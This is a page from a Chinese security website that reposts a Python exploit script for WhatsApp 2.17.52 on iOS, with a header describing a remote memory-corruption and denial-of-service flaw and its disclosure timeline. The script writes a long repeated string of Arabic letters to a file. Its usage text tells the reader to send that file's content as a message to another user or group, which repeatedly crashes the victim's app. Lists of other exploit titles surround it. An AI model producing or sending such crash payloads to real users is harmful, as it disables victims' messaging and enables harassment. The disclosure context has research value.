首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 WhatsApp 2.17.52 - Memory Corruption 来源：http://www.kpn.com 作者：Sacco 发布时间：2017-11-02   #!/usr/bin/env python # -*- coding: utf-8 -*- # Found this and more exploits on my open source security project: http://www.exploitpack.com # Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com # Date and time of release: 11 October 2017 # # Tested on: iPhone 5/6s iOS 10.3.3 and 11 # # Description: # WhatsApp 2.17.52 and prior is prone to a remote memory corruption. # This type of attacks are possible if the program uses memory inefficiently and does not impose limits on the amount of state used when necessary. # # Impact: # Resource exhaustion attacks exploit a design deficiency. An attacker could exploit this vulnerability to remotely corrupt the memory of the application forcing an uhandled exception # in the context of the application that could potentially result in a denial-of-service condition and/or remote memory corruption. # # Warning note: # Once a user receives the offending message it will automatically crash the application and if its restarted it will crash again until the message its manually removed from the user's history. # # Timeline: # 09/13/2017 - Research started # 09/13/2017 - First proof of concept # 09/15/2017 - Reported to Whatsapp # 09/20/2017 - Report Triaged by Facebook # 11/01/2017 - Facebook never replied back with a status fix # 11/01/2017 - Disclosure as zero day # Vendor homepage: http://www.whatsapp.com import sys reload(sys)   def whatsapp(filename):     sys.setdefaultencoding("utf-8")     payload = u'ب ة ت ث ج ح خ د ذ ر ز س ش ص ض ط ظ ع غ ف ق ك ل م ن' * 1337     sutf8 = payload.encode('UTF-8')     print "[*] Writing to file: " + filename     open(filename, 'w').write(payload)     print "[*] Done."   def howtouse():     print "Usage: whatsapp.py [FILENAME]"     print "[*] Mandatory arguments:"     print "[-] FILENAME"     sys.exit(-1)   if __name__ == "__main__":     try:         print "[*] WhatsApp 2.17.52 iOS - Remote memory corruption by Juan Sacco"         print "[*] How to use: Copy the content of the file and send it as a message to another whatsapp user or group"         whatsapp(sys.argv[1])     except IndexError:         howtouse()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Easy MPEG/AVI/DIVX/WMV/RM to D ·Vir.IT eXplorer Anti-Virus - P ·Oracle Java SE - Web Start jnl ·Sera 1.2 Local Root / Password ·Tizen Studio 1.3 Smart Develop ·Oracle PeopleSoft Enterprise P ·DameWare Remote Controller < 1 ·GraphicsMagick - Memory Disclo ·Watchdog Development Anti-Malw ·tnftp - 'savefile' Arbitrary C ·PHPMailer 5.2.21 Local File Di ·WordPress WP Mobile Detector 3   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved